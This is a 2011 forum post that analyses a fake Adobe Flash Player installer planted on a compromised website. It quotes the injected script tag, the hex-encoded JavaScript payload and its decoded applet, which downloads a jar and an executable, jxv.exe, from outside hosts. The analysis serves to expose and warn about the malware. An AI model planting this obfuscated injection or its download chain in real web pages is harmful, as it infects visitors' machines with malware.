Author Topic: Fake Adobe Flash Player  (Read 4237 times)

0 Members and 1 Guest are viewing this topic.

August 19, 2011, 03:27:43 pm
Read 4237 times

Weyne

  • Full Member

  • Offline
  • ***

  • 88
This site opens a Java applet that simulates installation of Adobe Flash Player. Printscreen:
http://img18.imagevenue.com/img.php?image=11946_printscreen_122_546lo.jpg

The code is inserted in this post:
Code: [Select]
http://www.boaputaria.com/2011/08/17/casada-de-curitiba-com-2-caiu-na-net/
It runs from this script:
Code: [Select]
<script src=http://www.colegionovodamaia.pt/portal/images/.../is.js></script>
The script is encoded in hexadecimal:
Code: [Select]
document.write(unescape('%3C%61%70%70%6C%65%74%20%6E%61%6D%65%3D%22%41%64%6F%62%65%20%46%6C%61%73%68%20%50%6C%61%79%65%72%20%31%31%22%20%63%6F%64%65%3D%22%61%66%70%2E%63%6C%61%73%73%22%20%61%72%63%68%69%76%65%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%63%6F%6C%65%67%69%6F%6E%6F%76%6F%64%61%6D%61%69%61%2E%70%74%2F%61%66%70%2E%6A%61%72%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%70%61%72%61%6D%20%6E%61%6D%65%3D%22%6C%69%6E%6B%22%20%76%61%6C%75%65%3D%22%68%74%74%70%3A%2F%2F%32%31%37%2E%31%37%30%2E%31%2E%33%35%3A%31%30%31%30%2F%6A%78%76%2E%65%78%65%22%3E%3C%2F%61%70%70%6C%65%74%3E'));
Decoding to ASCII:
Code: [Select]
<applet name="Adobe Flash Player 11" code="afp.class" archive="http://www.colegionovodamaia.pt/afp.jar" width="1" height="1"><param name="link" value="http://217.170.1.35:1010/jxv.exe"></applet>
If the user accepts, it will occur the installation of the file jxv.exe.

jxv.exe is a virus:
http://www.virustotal.com/file-scan/report.html?id=5b13450bc8b7da15a50fdaaa86bf3877511ee960ae18617c217a0070f81eb54b-1313767053